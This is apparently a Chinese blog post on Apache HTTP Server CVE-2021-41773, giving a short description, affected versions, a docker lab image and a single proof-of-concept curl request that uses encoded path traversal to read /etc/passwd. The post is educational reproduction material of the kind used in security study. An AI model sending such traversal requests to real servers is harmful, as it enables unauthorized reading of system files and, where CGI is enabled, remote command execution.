常见中间件漏洞(四、Apache合集)

目录

四、Apache

[4.1 CVE-2021-41773](#4.1 CVE-2021-41773)

漏洞简介

影响版本

环境搭建

漏洞复现


四、Apache

4.1 CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件,在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)。

影响版本

Apache HTTP Server 2.4.49

某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
漏洞复现

1.使用poc

curl http://IP:PORT/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
相关推荐
Hello.Reader10 小时前
深入解析 Apache APISIX
java·apache
蜜獾云13 小时前
linux firewalld 命令详解
linux·运维·服务器·网络·windows·网络安全·firewalld
hwscom18 小时前
如何永久解决Apache Struts文件上传漏洞
java·服务器·struts·web安全·apache
白开水23318 小时前
Apache RocketMQ 5.1.3安装部署文档
apache·rocketmq
H轨迹H20 小时前
#渗透测试 kioptix level 2靶机通关教程及提权
网络安全·渗透测试·oscp
AirDroid_qs1 天前
Niushop开源商城(漏洞复现)
android·网络安全·开源
星竹1 天前
upload-labs-master第21关超详细教程
网络安全
蜜獾云1 天前
docker 安装雷池WAF防火墙 守护Web服务器
linux·运维·服务器·网络·网络安全·docker·容器
Clockwiseee2 天前
php伪协议
windows·安全·web安全·网络安全